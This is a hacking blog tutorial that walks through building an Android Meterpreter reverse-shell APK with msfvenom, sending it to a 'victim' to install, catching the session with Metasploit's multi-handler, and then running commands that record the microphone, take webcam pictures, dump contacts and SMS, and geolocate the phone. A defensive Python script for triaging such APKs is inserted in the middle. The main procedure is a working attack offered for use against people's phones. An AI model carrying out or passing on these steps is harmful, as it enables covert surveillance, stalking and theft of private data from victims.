
Monday, January 8, 2018

Hack Any Android Phone Remotely: msfvenom - Metasploit's payload generator

 Welcome to my first blog!
Today we are going to learn "HOW TO HACK ANY ANDROID PHONE WITH METASPLOIT REMOTELY"

msfvenom is a Kali Linux hacking tool for Android. It is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom.
Metasploit in Kali Linux is an old tool, and msfvenom enhances it.
So, let's get started!!
STEPS :


1. Fire up Kali and open a command terminal.

2. Set the payload and create the custom Android APK.
Command:
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
  
(To find your LHOST, open a new terminal and type ifconfig.)

Your APK file is saved in the Home folder.

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) to the victim's phone and install it.

4. Start the Metasploit Framework console as follows:

Command:
root@kali:~# msfconsole

5. Now it's time to open and set up the multi-handler. Follow these steps:
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Payload Handler is being started........

6. When the victim clicks on the app (installed as MAIN ACTIVITY in the menu) on his phone, a meterpreter session will be established.

7. Try the following exploit commands:
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate
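
From the defender's side, an APK like the one this procedure produces can be triaged statically before it is installed. The following is an added example, not code from the original post: it scans an APK for the permissions that the commands in step 7 depend on, for the package name `com.metasploit.stage`, and for a v1 signature. Assumptions: `triage_apk` and `build_sample` are hypothetical names, `com.metasploit.stage` is taken to be the stock stager's default package, the command-to-permission mapping follows Android's permission model, and the sample APK is constructed.

```python
import io
import zipfile

# Assumption: default package name of Metasploit's stock Android stager.
DEFAULT_PACKAGE = "com.metasploit.stage"
# Assumption: Android permissions that the step 7 commands rely on.
COMMAND_PERMISSIONS = {
    "record_mic": "android.permission.RECORD_AUDIO",
    "webcam_snap": "android.permission.CAMERA",
    "webcam_stream": "android.permission.CAMERA",
    "dump_contacts": "android.permission.READ_CONTACTS",
    "dump_sms": "android.permission.READ_SMS",
    "geolocate": "android.permission.ACCESS_FINE_LOCATION",
}

def _contains(blob, text):
    # Binary AndroidManifest.xml string pools are UTF-16LE or UTF-8.
    return text.encode("utf-8") in blob or text.encode("utf-16-le") in blob

def triage_apk(apk_bytes):
    """Return static findings for one APK given as raw bytes."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        names = apk.namelist()
        manifest = apk.read("AndroidManifest.xml") if "AndroidManifest.xml" in names else b""
        dex = b"".join(apk.read(n) for n in names if n.endswith(".dex"))
    enabled = sorted(c for c, p in COMMAND_PERMISSIONS.items() if _contains(manifest, p))
    return {
        "default_package": _contains(manifest, DEFAULT_PACKAGE)
        or _contains(dex, DEFAULT_PACKAGE.replace(".", "/")),
        "commands_enabled": enabled,
        # v1 (JAR) signature files only; v2+ signatures live in the APK signing block.
        "v1_signed": any(n.startswith("META-INF/") and n.endswith((".RSA", ".DSA", ".EC")) for n in names),
    }

def build_sample(package, permissions, signed):
    """Constructed sample: a zip that mimics an APK's layout, not a real app."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", "\0".join([package, *permissions]).encode("utf-16-le"))
        z.writestr("classes.dex", b"dex\n035\0")
        if signed:
            z.writestr("META-INF/CERT.RSA", b"constructed")
    return buf.getvalue()

if __name__ == "__main__":
    suspect = build_sample(DEFAULT_PACKAGE, COMMAND_PERMISSIONS.values(), signed=False)
    print(triage_apk(suspect))
```

A hit on the package name only catches an unmodified payload, so treat the permission set as the more durable signal when reviewing sideloaded apps.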

************************************************************************

Error fixing (in case you get PARSE ERROR)
Two methods:
1) Type the command "d2j-apk-sign andro.apk"
                                               
  Hope this works... :)

If you have any comments, let us hear them, and if you have problems, let us fix them! Just comment!

Join us on telegram https://t.me/hax4all
